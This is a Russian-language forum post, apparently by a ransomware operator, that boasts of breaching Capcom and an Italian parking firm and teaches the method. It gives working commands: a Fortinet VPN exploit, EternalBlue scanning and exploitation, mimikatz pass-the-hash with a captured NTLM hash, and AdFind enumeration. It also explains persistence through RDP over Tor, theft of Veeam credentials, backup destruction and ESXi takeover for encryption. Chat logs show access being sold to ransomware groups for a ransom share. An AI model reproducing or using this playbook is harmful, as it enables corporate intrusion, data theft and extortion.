Боря!!! как я ждал)Дело о Kenzo Tsujimoto
Предисловие:
Прежде всего, в этом очерке, я хочу рассказать о том, что порог входа в пенетрирование сетей не такой высокий.
И, как не имея «0 дей» и «1 дей» - и даже не имея денег, можно нагнуть Capcom.
Осенью 2020 года мы нашли CVE-2018-13379.
Представляете, экслойт просто валялся на гите с 19 года- и его никто даже не пробывал использовать. А мы попробывали - но пришлось чутка доработать.
Как-то, в одну из ночей, кодер скинул новый материал с пометками. В одной из пометок я читаю: «capcom». По ходу какая доставка еды в японии - подумалось мне какая доставка???.
И я был приятно удивлен войдя в периметр.
Посмотреть вложение 25076 Посмотреть вложение 25077
Ремарка: В конце текста, я проведу некей анализ рынка. Перед написанием статьи,
я специально искал выходы на приват пп. Мне удалось связаться с нефильмом и конти
Я выдал им по сети (те что сам не смог сделать ) и покажу вам что из этого вышло.
Все дело пенетрировалось на вирте вин сервер 2012
Сейчас эскплойт доступен в metasploit (search forti os)
Первоначальная разведка:
При подключении к впн- вам нужно обязательно снять роуты. Для этого был сляпан замечальнй скрипт, который их снимает и сканирует на уязвимости: «eternalblue» и «smbghost».
1. Укалдываем сканер на удобное место и
устанавливаем «Python 3 и nmap»;
2. Отрубаемся от впн;
3. Далее: cmd cd путь где валяються скрипы Python s.py - он снимает ваши роуты без подключения к впн и ждет появления новых;
Код:C:\F>python s.py [11:03:07][!] Parsing default routes ... > 10.0.2.0/24 [11:03:07][*] Waiting for route changes ... [11:03:08][*] Waiting for route changes ... [11:03:09][*] Waiting for route changes ... [11:03:10][*] Waiting for route changes ... [11:03:11][*] Waiting for route changes ... [11:03:12][*] Waiting for route changes ... [11:03:13][*] Waiting for route changes ... [11:03:14][*] Waiting for route changes ... [11:03:15][*] Waiting for route changes ...
При подключении к Впн, он выполняет новые роуты и сам начнет их сканировать.
Код:[11:04:55][+] Changes detected, following routes added: > 10.60.0.0/16 > 10.70.0.0/16 > 10.80.0.0/16 > 10.90.0.0/16 > 10.209.174.0/23 > 10.249.0.0/16 > 172.16.0.0/16 > 192.168.2.0/23 > 192.168.255.0/26 [11:04:55][+] Launching multithreader scan ...
Жара пошла)))
Код:11:04:55][+] Launching multithreader scan ... 10.90.1.3 10.80.72.19 10.249.2.37 10.249.2.38 10.249.2.42 10.249.2.43 10.90.1.6 > Vulnerable to EternalBlue! > Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1) 10.80.72.20 > Vulnerable to EternalBlue! > Windows Storage Server 2008 R2 Workgroup 7601 Service Pack 1 (Windows Stora ge Server 2008 R2 Workgroup 6.1) 10.80.3.19 10.90.65.18 172.16.132.253 10.80.3.20 10.90.3.18 Hosts Vulnerable to EternalBlue (11):10.80.72.19, 10.90.1.6, 10.70.72.23, 10 0.24, 10.80.12.4, 10.80.47.4, 10.90.92.5, 10.249.52.89, 10.80.1.19, 10.80.1. 10.80.1.21
Неееереальная любовь реееально накрывала (*поет как Темникова)
Посмотреть вложение 25079
В капкоме их было около 40 штук.
Для наглядного написания нашей статьи,
я взял в пример «циско впн» паркова в Италии.
Корпа с небольшим ревеню и хорошей ифраструктурой (как выяснилось позже - ужасной). Данная корпа очень схожа с инфраструктурой капкома (такой же пиздец в плане безопасности).
Читая лог сканер, я понимал: в капкоме мы будем жить очень долго и лить даты очень хорошо...
Нужно осмотреться. Как мы это называем на своем сленге- «гниды» (виртуалки для пентеста). После того, как осмотрелись - гнидануться в сеть.
Для этих целей я использую мячик(он же софтперфект нет сканер).
Открываем сканер прыгаем в опшенс и настраиваем примерно так же. Затем файл импорт ип лист хостейм. И вписываем туда роуты капков (метропарка любой другой компании)SoftPerfect : system and network management software
SoftPerfect - Australian software development company. Free and commercial solutions for home, office, enterprise, local networks and the Internet.www.softperfect.com
Посмотреть вложение 25080 Посмотреть вложение 25081 Посмотреть вложение 25082 Посмотреть вложение 25083 Посмотреть вложение 25084
10.0.2.0/24
10.60.0.0/16
10.70.0.0/16
10.80.0.0/16
10.90.0.0/16
10.209.174.0/23
10.249.0.0/16
172.16.0.0/16
192.168.2.0/23
192.168.255.0/26
*Цитатка вспоминалась: «А сегодня в завтрашний день не все могут смотреть. Вернее смотреть могут не только лишь все, мало кто может это делать». (C)
Мячик нам выдаст примерную структуру сети (ту которую видно с вашей гниды - мы пока еще не внутри сети). Так мы определяем примерное наличие доменов и домен контролеров.
Имея креды в домене, даже юзерские, мы легко можем пробить етернал - даже метосплотовскими силами.
Вам я дарю «eternalblack» - никому хуже не станет от того, что я тут его выложу.
Данная улита написана автором плейбит. Для более удобного эсплуатироания eternalblue. В работе я использовал чистый пейлоад метерпретера, но можно использовать и какой-нибудь легитимный dll для создания юзера.
Работает утилита так: ebb.exe 10.80.23.19 ip youpaload.
Посмотреть вложение 25086
Сессия пришла. Первое, что нужно сделать: net group "Domain Admins /domain".
Это вернёт нам домен-админов; в капкоме их было около 15.
Наша задача найти либо хэш, либо клир пасс домен админа. Если вы пошли по пути создания совего локального юзера, то просто снимайте lsass дампы и пихайте в мимик.
К 10 тачке у меня таки был их домен админ - «adm_babak».
Кстати, в метропарке у нас тоже есть, да.
c4dbf115be2a3348e01dac07e149774c
Result:
Not Found, it is being cracked by our background system.
Please wait up to 5 days. A notification email will be sent to you when it is cracked successful , otherwise it is cracked failure.
Не беда! есть pth
PASS-THE-HASH ATTACKS. Если простым языком - это даст нам авторизоваться в системе по хешу.
Обязательно качаем псекс - через него мы будем заходить на сервак, и делать «рестрикт админ»- что бы ворваться в рдп.
sekurlsa::pth /user:administrator /domain:SD0603159 /ntlm:c4dbf115be2a3348e01dac07e149774c
Код:C:\>p.exe \\10.80.23.19 cmd PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>
Как мы видим, авторизовались без кредов. выполним
Исполнение этой команды на их хосте, дало нам возможность подписать mstsc хэшем и зайти без пасса.
Гуд…, подпишем mstsc - я грабил даже там, где не был.
sekurlsa::pth /user:administrator /domain:SD0603159 /ntlm:c4dbf115be2a3348e01dac07e149774c /run:"mstsc.exe /restrictedadmin"
И вот мы в периметре:
Есть такой замечательный инструмент - «Adfind» называеться. Качнуть его можно в гугле. Как установите - создайте рядом с ним батник, и закиньте на комп в их сети , тоесть в домене. Главное, потом не забыть удалить.
Код:adfind.exe -f (objectcategory=person) > ad_users.txt даст юзеров этом домене adfind.exe -f objectcategory=computer > ad_computers.txt компы в том числе и трупы adfind.exe -subnets -f (objectCategory=subnet) | findstr ">cn: " > ad_subnets.txt доп подсети что не снелись софтом adfind.exe -f "(objectcategory=group)" > ad_group.txt группы adfind.exe -gcb -sc trustdmp > ad_trustdmp.txt dc
На самом деле, в случаи метропарка, ситуация интересная: мы на контролере одного из доменов. В домене 2 компа, всего доменов около 30 штук - и все они имеют SD0603159, примерно вот такие название. И я уверен, что в каждом из них будет не более двух пк (это паркова 3 милиона ревеню).
*На самом деле, всё это не важно - я показываю метологию своей работы
Теперь нам нужно затянуть мячик на этот комп и просканировать сеть - уже из нутри домена. Это откроет полную картину сети. И тут мы плавненько переходим к поиску бекап систем файл-серверов и данных.
В течении пары часов была разложена вся структура capcom. Я выяснил, что за бекап систему отвечает «вис» (мы еще вернемся к нему и я покажу, как состилить пароли с вима). Данные лежат на насах,
вся корпа работает на 1 домене, а за инфраструктуру отвечает vmare esxi.
На тот момент, конечно, не было esxi. Решения у продукта, которым я лочил, поэтому сеть была накрыта изнутри (так делать не нужно) - если у вас сеть на esx,
вы лучше рвите жопу и ставьте esx.
Далее просиходили просто необъяснимые вещи: мы думали как нам не спалиться и скачать побольше даты.
Было выяснено, что админ Бабак - забытый богом админ. Я просто взял сервера у Редбира, поставил винspc и начал качать дату японцев. Вот тут началось самая жопа. Дату выбирали и качали мы месяца так полтора. 1тб - скорость выкачаки, была просто космос))) Все полтора месяца мы трясли башкой: «А вдруг придет пизда».
Но на вторую неделю я предложил дополнительно там закрепиться.
Я прокинуn рдп овер тор на 10 пк в сети.
![]()
Ðак оÑганизоваÑÑ RDP over Tor ÑеÑез hiddenservice?
ÐÑвеÑили на вопÑÐ¾Ñ 1 Ñеловек. ÐÑениÑе лÑÑÑие оÑвеÑÑ! РподпиÑиÑеÑÑ Ð½Ð° вопÑоÑ, ÑÑÐ¾Ð±Ñ ÑзнаваÑÑ Ð¾ поÑвлении новÑÑ Ð¾ÑвеÑов.qna.habr.com
Прикладываю exe, который автоматически развернет вам рдв овер тор и сплюнет онион адрес, и можно будет подключаться по рдп через тор в сетку)
просто кликаете exe pass tor_socks.
На последней неделе перед атакой - впн отъебнулся и отвалились единсвенные креды в юсовом устрйовсе капкома. В раследовании они так и напишут - что мы зашли через Юсу.
Бекап-система капкома, как и почти в любой биллионой корпе, бекапила на съемные ленты и они вытаскивались (нам удалось уничтожить данные за 2 месяца).
*Кстати о стилинги паролей с вима:
1. зайдем на сам вим сервер качнем ssms https://docs.microsoft.com/en-us/sq...-management-studio-ssms?view=sql-server-ver15
2. Установим. Зачастую, потребуется ребут вим сервака. После ребута открываем «mssql managment studio», там авторизуемся под кредами нашего домен админа;
3. Выбираем базу данных Veeam;
4. И делаем такой запрос к этой бд:
Это вернет нам все хэши и юзернейма с бекап системы. И это значит: и от всего, что там есть- от все структуры esx, насы и так далее.
Но теперь нужно расколоть эти пасы.
Без проблем, пацаны.
Открываем повершелл:
Далее:
И вот мы собрали пароль от всего, что было в капкоме.
я хочу рассказать вам о своих недоработках, касаемо капкома, и как бы я сейчас сделал.
1)нанял бы инсдеров на работу с данными;
2)Уебал бы им вмвару вместе с гейм сервервами львиная доля,которых крутилась на линукс. Легло бы 400 тб данных на их esx.
Ну да ладно. По этому поводу я расскажу, как можно поработать с вмварой: сбросить пассы на esx, если их нет через вцентр.
В нашей ситуации, мы имеем креды от вцентра administrator@vsphere.local
Заходим в вцентр и выбираем esx хост, жмакаем Configuration.
Authentication Services - Properties Join Domain. На хосте в домене наберем systeminfo - он выплюнет домен вот в таком формате как там. Вставляем в поле домен,
далее вводим креды домен админа без домена - тоесть без DOMAIN\
Всё.
Теперь идём на контролер домена, там октрываем юзеры и компьютеры- и делаем там группу ESX Admins. Добавляем туда своего юзера.
Теперь можно зайти на esx через веб. Сбросить рут юзеру, включить ssh, выключить вирты, удалить снеп шоты и шифрануть - и ав вам не страшен.
После слива данных с капкома началась эпопея с тем, куда же мне поставить такую корпу. На тот момент, я работал с распиздяем «Локбитом», которого я неделю просил кастомизоровать записку. И я сообщал, что буду ставить капком - не получил ни ответа - ни привета.
Затем, я обратился к господину аннону из «Ревиллов».
Взял эти ваши «ревилы» погонять - меня не устроило вообще всё: как работает локер, в первую очередь. И то, что он там дал интервью уже, что будет гейм корпу ставить. Кто он вообще такой, чтобы вести такие разговоры? Если эту корпа моя и ставить её буду я.
Я им указал на ошибки - они сказали, что всё исправят, но ничего не исправлялось.
На тот момент мы вели задушевные беседы с овнером «Рагнара». Просто душевная общуха. Я с ними до этого не работал. Ну и я ему закинул такую тему - естественно всё срослось, мы быстро все поставили и капки легли.
Причины их отказа платить я описал выше.
Но главной причиной является то, что префектура японии им просто запретила нам заплатить. Но я уверен: если бы мы соблюли два пункта, описанных выше - всё было бы ок.
Как я писал в предисловии к этой статье: перед написанием материла я сконтачился «нефильами» и «конти». Выдал им по сети, что сам не смог сделать (я всегда боялся брать сети в работу у других людей).
Знаете, такие вот страхи, что я не потяну и будут в мою сторону предъявы. Но, на самом деле, ситуации, которые сегодня произошли - меня очень приподняли.
Ники на форумах не «Конти» и «нефильма» я светить не буду - просто скину переписки.
*Диалог с нефильмами (как всегда все охуенно топовые команда):
Даю точку входа впн юзер в домене.
Сам до этого взял н число доменов там.’
и будут как бы тоже не простые все
9:24 я по сути даю то что сам
9:24 не потянул
нефильмы@vipclub.pm
9:24 давай нормальное)
9:24 у нас больше шансов на выплату
9:24 без обид)
9:24 ы
я@exploit.im
9:24 да баратн нормальное я сам наебну
9:24 хех
нефильмы@vipclub.pm
9:24 не дело в скиле
я@exploit.im
9:24 какие у вас в нефильме условия?
нефильмы@vipclub.pm
9:24 20% от выплаты твои
9:24 от 100%
9:24 локер наш
я@exploit.im
9:24 не в скиле дело?)
нефильмы@vipclub.pm
9:24 ну в скиле
я@exploit.im
9:24 тоесть если я сам свою сеть на ваш локер поставлю
нефильмы@vipclub.pm
9:24 у нас по докам сильные людяхи сидят
я@exploit.im
9:25 я получу 20 процентов
9:25 ?
нефильмы@vipclub.pm
9:25 тоесть ты даешь нам сеть мы лочим мы тебе 20% от выплаты
9:25 от 100%
9:25 типо дадут 1кк 200к твои
я@exploit.im
9:26 ну ок как то дам парочку) просто не вижу смысла давать то что самому можно сделать
9:26 проблема в том
9:26 что вы не хотите взять на локер
9:26 хех
9:26 ну давай как то попробуем
нефильмы@vipclub.pm
9:26 nt,t kjrt
9:26 tebe loker nado?
9:26 20% nam otdavai ya tebe vudam
я@exploit.im
9:26 esxi есть?
нефильмы@vipclub.pm
9:27 -
9:27 ты
9:27 каким
9:27 локером работаешоь?
я@exploit.im
9:28
9:28 короче там где есть esx
9:28 но
9:28 мне нужно что. Бы esx
9:28 работало без костылей
9:28 что бы от 5 до 7й
9:30 знаешь сегодняшня ситуация меня приподняла
9:30 где то я думал что скила у меня не так много
9:30 сегодня я понял
9:30 скил у меня есть XD
нефильмы@vipclub.pm
9:31 ))
9:31 да ладно сейчас много умных ребят
я@exploit.im
9:31 Было бы грустно
9:31 если бы ты поднялся там
9:31 а я нет
9:31 )
9:32
тут я передаю им креды от доменов в корпе
нефильмы@vipclub.pm
9:32 петух
9:32 и
9:32 петухи
9:32 отрубили
9:32 все линки впн и тд
9:32 эти айти)
9:32 нельзя зайти
9:32 мб поднимут рано или поздно
9:32 и креды подойдут)
9:33 ыыы
9:33 красава) че
9:33 этим же юзером?
я@exploit.im
9:33 ну там как минимум 2 зерелогона
нефильмы@vipclub.pm
9:34 удар по самолюбию сейчас я буду наблюдать)
я@exploit.im
9:34 как минимум 6 етерналов
9:34 )
нефильмы@vipclub.pm
9:34 делать ее дальше?
я@exploit.im
9:34 ну ты же сказал
9:34 она упала
нефильмы@vipclub.pm
9:34 не я имел ввиду
я@exploit.im
9:34 делай я дал что было у меня
нефильмы@vipclub.pm
9:34 я через линки
я@exploit.im
9:34 это их клиенты
нефильмы@vipclub.pm
9:34 впны
9:34 да она работает
я@exploit.im
9:34 а нужен оснвоной домен
9:34 ихз
нефильмы@vipclub.pm
9:34 форти
я@exploit.im
9:34 там esxi
нефильмы@vipclub.pm
9:34 я имел ввиду
я@exploit.im
9:34 кластера
нефильмы@vipclub.pm
9:35 у них есть цитриксы и впны но они отключены
я@exploit.im
9:35 нужно врываться в домен TA
нефильмы@vipclub.pm
9:35 мб юзеры бы подошли
я@exploit.im
9:35 без 0 деев
9:35 там делать нехуй
9:35 у меня их нет
9:35 в TA Своим арсеналом я не попал
нефильмы@vipclub.pm
9:36 понял
я@exploit.im
9:36 креды стилить с вима умеешь?
нефильмы@vipclub.pm
9:36 я админ просто мне это все даже не интересно
я@exploit.im
9:37 локер интересно мне
нефильмы@vipclub.pm
9:37 я свое от сидел отдрочил 2 года назад)
я@exploit.im
9:37 больше чем твои пентестеры)
9:37 сорян)
нефильмы@vipclub.pm
9:37 ну смотри
9:37 мы можем предоставить
9:37 20% от выплаты нам, даешь мне заранее ав и почты
9:37 3 разных
9:37 в блоге будем размещать
9:37 если что
нефильмы@vipclub.pm
9:39 % kakoi ho4esh
я@exploit.im
9:39 это все зависит от суммы
9:39 можно и 40
9:39 если сумма ок
9:40 динамику
9:40 хочу
нефильмы@vipclub.pm
9:40 взять все не проблема)
9:40 и все самим сделать4
я@exploit.im
9:40 нефильмы@vipclub.pm
9:40
взять все не проблема)
9:40
и все самим сделать4
9:40 ну вот я дал тебе взять)
9:40 то что вы возьмете
9:40 я возьму тоже)
9:40 мне то какой толк
9:40 нихуя не делать я тоже не хочу
9:40 мне как бы нравиться
9:40 сетки ебашить
нефильмы@vipclub.pm
9:40 )))
9:41 дак можно и так и так)
9:41 и сам делать давать и давать что бы делали)
9:41 тоже сидеть никто нех очет)
9:41 в этом и прикол)
я@exploit.im
9:41 ну вот пердай своим что я дал
нефильмы@vipclub.pm
9:42 к
9:42 сек
9:42 никого нету завтра скину хочу сгеодня отдохнуть 4 дня не высыпался
я@exploit.im
9:42 отдыхай
9:42 )
9:43 знашеь никогда не радовался так тому что с корпой ничего не вышло
9:43 х#й знает
9:43 ахахах
9:43 приподняло
9:43 очень
нефильмы@vipclub.pm
9:43 думаю сейчас
9:43 зайдет кто дам
нефильмы@vipclub.pm
9:54 дал
9:54 ее
я@exploit.im
9:54 окей
9:54 )
нефильмы@vipclub.pm
9:55 удар по самолюбию
9:55 только что был)
9:55 хД
9:55 расслабились че то)
я@exploit.im
9:55 это по пентестерам твоим удар)
9:55 ты же просто админ
нефильмы@vipclub.pm
9:55 да мне терь интересно буду говорить ты не смог а он смог)
9:55 подьебывать)
9:56 поток сеток организуешь?)
я@exploit.im
9:56 ну я тебе уже сказал есть инетрес сови сети ставить условия я тоже тебе описал
9:56 если у вас крутые такие челы по дате
9:56 то что бы нет
нефильмы@vipclub.pm
9:56 30% и то я поговорю еще
9:57 может не соглас будет ну я уверен что не согласятся
я@exploit.im
9:57 дело их) мне как то похую)
я@exploit.im
10:06 Нужно жить настоящим и думать о будущем
нефильмы@vipclub.pm
10:06 да я вот думаю ))
нефильмы@vipclub.pm
10:13 взяли
10:13 ДА
10:13 хД
10:13 пишет спрашивает как ты это сделал)
я@exploit.im
10:14 и corporate
нефильмы@vipclub.pm
10:14 спрашивает
10:14 как ты это сделал
10:14 вообще
10:14 странно все перепробовали
я@exploit.im
10:14 ну как мимнимум скажи что там зерелогон
10:14 и 6 етернал блу
10:15 А сегодня в завтрашний день не все могут смотреть. Вернее смотреть могут не только лишь все, мало кто может это делать.
10:15 (С)
10:15 ) и да я вам дал в тех доменах которые сам взял
нефильмы@vipclub.pm
10:15 ща попадет
10:15 )
10:16 а в другие же не попадешь
я@exploit.im
10:17 без 0 деев врятли
10:17 еще
нефильмы@vipclub.pm
10:17 есть
10:17 0
я@exploit.im
10:17 vsphere.local
10:17 это вцентер
10:17 их
10:17 он на винде
10:17 в домене
10:18 vsphere.local
10:18 вам еще туда
10:18 )
10:18 попробуйте
нефильмы@vipclub.pm
10:20 дак его не видно
я@exploit.im
10:20 должно быть видно
10:20 роуты проскань
10:20 те что я скинул
нефильмы@vipclub.pm
10:20 к
10:20 ща сек
10:20 а все понял
10:21 это я кароч завтра дам инфу я спать
я@exploit.im
10:21 давай)
10:21 ты наврено с мыслями пойдешь нахуй вообще со мной связался
10:21 азахахаха
нефильмы@vipclub.pm
10:21 не
10:21 ы
10:21 он подьтянет
10:21 ща
10:22 сейчас они пусть ебутся
10:22 завтра после обеда будешь?
я@exploit.im
10:23 Да все лето буду почти всегда онлайн
нефильмы@vipclub.pm
10:23 ок завтра спишемся) поору
я@exploit.im
10:23 главное что бы не поорал)
нефильмы@vipclub.pm
10:23 такой удар по гордости))
я@exploit.im
10:23 еще сильней
нефильмы@vipclub.pm
10:23 =)))
10:23 до завтра бро
я@exploit.im
10:24 пока
нефильмы@vipclub.pm
10:24 черкани мне наф оруме в лс что бы не потерялся конаткт на всякий
я@exploit.im
10:25 дай линк
10:25 на профиль
10:25 а все
10:25 фарнетворк
10:25 да я помню
10:35 Статус: Auto Status (idle)
Как мы видим из переписки: админ этого «нефильма» ушёл спать очень недовольный своими пентестерами.
*А вот с конти:
conti
10:16 ага ну пока что в работе
10:16 они пропаченные там
я
10:16 я это знаю мужик
10:16 в целом от меня будут такие сети
10:16 так как там где могу я сам
10:16 у меня выходит
10:16 там где не вышло у меня
conti
10:16 мне самому интересно сам наверное подключусь )
Если их "команды" называются топовыми,
то кто тогда я?
Теперь давайте поговорим за команды команд АПТ ДТП ПТУ Хуиту.
Наша команда: кодер-питонист (кто собственно все эти паблики допиливал),
второй пентестер (мой ученик), третий пентестер-подмастерье (на тот момент принеси-подай), ну и собственно я.
Короче: Борис, Крюк, Биба и печник- вот и вся наша команда.
Лучше всех было Крюку- он получал ровную долю с проставок и сидел на жопе ровно. Мы же отрабатывали пульсы и фортики.
Я всегда говорил: пацаны, ищем выходы на 0 деи. Деньги есть - большие деньги. Но вся команда ныла: фортики фортики фортики, их на всю жизнь хватит…
Конечно, никто ничего не искал. Приходилось заниматься всем самому. Проблема в том, что я считал их «мои пацаны». А это бизнес - суровый бизнес. Здесь «моих пацанов» не существует. Если работают плохо и планы не совпадают- значит уже «не мои».
Нужно было их просто выдрачивать так, чтобы делали только то, что я им говорю.
Так что лучше работайте в одиночку, либо руководите умело. Сейчас я пошёл по пути работы в одного. И, знаете, кпд не упало, а только выросло. Откинул от себя ненужные контакты и ненужных мне людей.
Подводя итоги статьи, могу сказать, что пентест сетей не такой уж сложный процесс для изучения. Сложно этому кого-то учить (если изначально человек в теме на уровне ноль).
Так как вариантов решения одной задачи может быть масса. Но, в первую очередь, вам нужно влюбиться в пентест.
Ну как и в любую другую работу (а иначе это насилие над собой, а не работа).
Все методы, описанные мной, есть в гугле - на официальных сайтах продуктов.
Читайте больше обзоров аверов, читайте их Твитеры. Часто они описывают полную методологию какой-либо из атак.
P.S: Что касается метропарка - это обычный паркинг с данными камер. Поэтому далее его смотреть я не стал.
P.P.S: Вот вы гоните нас ссаной тряпкой: рансомщики - пидорасы. А мы есть будущее, прогнали нас отсюда - не беда
я строю уютный дом для нас...
*Выражаю особую благодарность овнеру рагнара - ты лютый чел, Спасибо тебе за то, что мы с тобой общались. И Unit8200 за то, что когда я начал интересоваться темой, ты мне сказал: «Иди нахуй, учись сам- есть гугл». Спасибо и тебе от души.
Инструменты